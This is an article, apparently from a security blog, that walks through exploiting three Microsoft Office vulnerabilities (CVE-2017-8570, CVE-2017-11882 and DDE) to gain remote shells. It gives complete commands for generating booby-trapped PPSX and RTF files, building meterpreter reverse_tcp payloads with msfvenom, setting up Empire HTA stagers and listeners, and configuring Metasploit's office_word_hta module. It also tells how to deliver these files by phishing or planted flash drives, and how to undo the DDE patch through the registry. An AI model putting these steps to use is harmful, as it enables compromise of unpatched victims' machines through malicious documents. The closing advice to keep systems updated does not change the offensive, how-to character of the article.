Poisoned documents. How to exploit dangerous Microsoft Office bugs

This article addresses several critical vulnerabilities in Microsoft Office programs. They aren’t new and had caused a great stir a while back. Metasploit Framework modules have already been developed for these bugs, and plenty of related projects are available on GitHub. However, unpatched copies of Microsoft Office (starting from version 2003 and up to and including Office 2016) still remain in the wild dragging down corporate security and opening paths for malicious attacks.

Incorrect OLE response processing (CVE-2017-8570)

This bug originates from an error involving incorrect processing of server’s responses in the Microsoft OLE (Object Linking and Embedding) technology that allows embedding and linking to documents and other objects. On the one hand, this feature is handy, while on the other hand, extremely unsafe.

When you open an infected document, the application makes a request to a remote server to retrieve the file embedded into that document. The server returns a specially crafted package containing a malicious HTA file whose arbitrary code is executed on your system after the download.

The problem was discovered back in April 2017. Another important event occurred in August: Cisco security experts reported a new vulnerability related to the first one and affecting MS Office 2007: CVE-2017-0199. In the past, RTF (Rich Text Format) documents were used for attacks, while the new threat pertained to PowerPoint (.ppsx documents.

How it works

Attacks exploiting this vulnerability can be described with a single word: phishing. Most of them follow a brutally simple scenario: the victim receives an e-mail with a malicious Word document, and is tricked into opening it. The document contains an OLE2link object. If the victim uses the Protected View mode, the exploit won’t work; otherwise, an HTTP request is sent to the attacker’s server and an HTA file disguised under an RTF is downloaded.

HTA file disguised under an RTF document is downloaded

HTA file disguised under an RTF document is downloaded

Dump listing in disassembler showing the malicious content

Dump listing in disassembler showing the malicious content

The downloaded HTA file is executed automatically. As a result, the exploit is implemented, while the original Word document is closed. Instead of that document, a fake document opens to lull the victim into a false sense of security.

Exploitation

The best source of exploits is GitHub. I will use the exploit toolkit by tezukanice. Create a folder named template in Office8570, and place the downloaded file template.ppsx there.

Preparatory phase

Preparatory phase

Then I launch a script to generate a PPSX file with payload:

$ python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc

I specify the victim’s IP (in my case, it is 192.168.0.104) and see that the file Invoice.ppsx has been generated.

Generating a file with payload

Generating a file with payload

Using the Metasploit Framework, I create the payload in the form of the shell.exe file stored in the tmp folder:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe

Done! Now I launch a listener to check the port:

$ msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"

To make the things running, one more step is required: enter the command launching a local server on port 80.

$ python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe

And finally, I have to deliver the infected PowerPoint file (Invoice.ppsx) to the victim’s PC. There are many ways to do this. I can write a phishing letter, plant a flash drive, etc. When the victim opens the file, the exploit is implemented, and I get a Windows shell.

The video below demonstrates the exploitation of this vulnerability.

Buffer overflow in equation editor (CVE-2017-11882)

This nasty vulnerability enabling to execute an arbitrary code in the context of the current user is 17 (!) years old.

According to IT experts, the problem originates from the seemingly harmless Microsoft Equation Editor (EQNEDT32.EXE). However, this file was last compiled on November 9, 2000. Of course, it does not meet the modern security standards. In Office 2007, this component is replaced by a new version, but the old one is still distributed – after all, people may need to open old documents, right?


Embedi analysts found in EQNEDT32.EXE two vulnerabilities related to data corruption in the memory (buffer overflow). Malicious OLE objects exploiting these vulnerabilities and embedded into a document make it possible to execute an arbitrary code on the victim’s machine, for instance, download any file from a remote server and execute it. Sounds great, doesn’t it?

Exploitation

I will use a premade exploit from GitHub; many thanks to Ridter. I clone the repository and make the scripts executable:

$ git clone https://github.com/Ridter/CVE-2017-11882
$ cd CVE-2017-11882
$ chmod +x Command109b_CVE-2017-11882.py
$ chmod +x Command43b_CVE-2017-11882.py

I will need the Empire post-exploitation framework to create listeners. If you are not familiar with Empire, a ‘listener’ is a process that listens for a connection from the attacking machine on my IP address and port number that will be used for incoming connections on the victim’s PC.

Downloading Empire:

$ git clone https://github.com/adaptivethreat/Empire.git

Now it can be launched; help displays available commands.


To create listeners, I enter the following commands:

listeners
uselistener http

Specifying the initial settings:

  • set <Name http> – name of the HTTP listener;
  • set <Host ip> – host IP to be connected with;
  • set <Port> – port to send the data to; and
  • execute.

Once finished, I return to the man menu using the main command.

Back to the main menu

Back to the main menu

Then I create HTA payload using the following commands:

  • usestager windows/hta – use the required module;
  • set Listener http – launch the HTTP listener;
  • set OutFile /tmp/hack1.hta – specify the file save path and give it an unsuspicious name; and
  • execute – finish the generation and exit the menu.
Creating payload

Creating payload

Almost done! Now I have to go to the /tmp folder and retrieve my combat file hackl.hta (the one to be executed on the victim’s computer).

INFO

The HTA (HTML Application) format makes it possible to open HTML documents without a browser. Such applications are executed using the program mshta.exe that includes an undocumented function: RunHTMLApplication. The default extension of such executable files in Windows is .hta.

Many users won’t risk running an HTA file on their computers; so I am going to wrap it into a Word document. Everybody knows that those documents are harmless!

I go back to the console and enter the following command:

$ python Command109b_CVE-2017-11882.py -c "mshta <link>" -o Example.rtf

In this case, mshta <link> is the URL to the hack1.hta file stored on my server.

Now have to deliver that file to the target machine. As soon as it is opened, the connection will be established, and I get access to PowerShell.

Connecting to victim's PC

Connecting to victim’s PC

DDE exploitation (CVE-2017-11826)

In October 2018, researchers of Qihoo 360 Technology Co. Ltd., a Chinese Internet security company, have reported a zero-day vulnerability in Microsoft Office 2016 (according to some sources, this vulnerability initially appeared in version 2013). By that time, it was already actively exploited: a massive attack targeting enterprises had been launched. This attack had a distinctive feature: it did not use OLE objects or macros.

Demonstration

From the victim’s perspective, the attack looks as follows. You receive a letter with an attached document, open it, and see the following notification.


If you press the “Yes” button, another notification pops-up.


And one more.


Below is a tree-like representation of the process provided that the exploit has worked right.

Malicious program is loaded and executed from a Word document

Malicious program is loaded and executed from a Word document

How it works

This attack is based on a pretty old function called Microsoft Dynamic Data Exchange (DDE) enabling Microsoft Office applications to load data from other DDE applications. For instance, a table in a Word document may be automatically updated when it is opened: the table data are loaded from an Excel file.

Every time DDE is run, the application normally displays two warnings shown below. However, according to specialists, the second warning (the one notifying the user of the error) may not be displayed in some situations.


The point is that frequent DDE users normally ignore such messages. People got used to them so much that close the warnings without reading.

Security researchers, including experts of SensePost and Cisco Talos, repeatedly noted that DDE is often exploited by hackers. Microsoft specialists had refused to recognize this vulnerability for a long time. Finally, they released patch ADV170021 fixing the issue.

In fact, the possibility to use DDE for attacks is not a vulnerability in the usual sense: Microsoft Office warns the user about the potential risk. The problem is similar to the one involving macros and OLE.

In the meantime, DDE-based attacks are broadly practiced by hacking groups, including Fin7 known for its massive attacks targeting financial organizations. The above patch can prevent such attacks, but I bet it is not installed on many systems yet.

Unpatching the patch to reenable DDE

The patch makes minor changes in the registry and disables DDE by default. To reenable this function, all you have to do is change the value of one key:

\HKEY_CURRENT_USER\Software\Microsoft\Office\version\Word\Security AllowDDE(DWORD)

This dword may have the following values:

  • AllowDDE(DWORD) = 0 – disables DDE. This is the default value after the security update installation;
  • AllowDDE(DWORD) = 1 – allows DDE requests to already running programs but prevents requests that require to launch new programs;
  • AllowDDE(DWORD) = 2 – allows any DDE requests.

Exploitation

Let’s see whether it is possible to establish an active meterpreter session on a remote host (Windows 8.1, Windows 7, and Windows Server 2008). For that purpose, I will use a Python script generating an RTF file. All required components are included in the Metasploit Framework.

The respective module generates a malicious RTF document; if it is opened in a vulnerable MS Word version, the code is executed. The vulnerability lies in the fact that an OLE object can make an HTTP(S) request and execute an HTA code in response.

Now let’s get down to exploitation.

> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
> exploit


The highlighted link has to be delivered on the target host.


If the victim follows it and runs the downloaded file, an active meterpreter session will open.


Typing sysinfo to make sure that the goal is achieved.


Conclusions

In this article, I described three critical vulnerabilities that have been actively exploited. All of them are patched to a certain degree and may have limited applicability, but to the best of my knowledge, old versions of Microsoft Office (up to 2013) are still widespread; so, these issues will likely remain actual forever.

Remember: updates are not just a whim of Microsoft. Timely updates are mandatory (although not the only) security prerequisites. Months may pass between the time of the problem discovery and the time it is patched. Therefore, even if you install updates on a regular basis, the risk of receiving a nasty surprise in an innocent looking document still exists. Keep your eyes open!


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>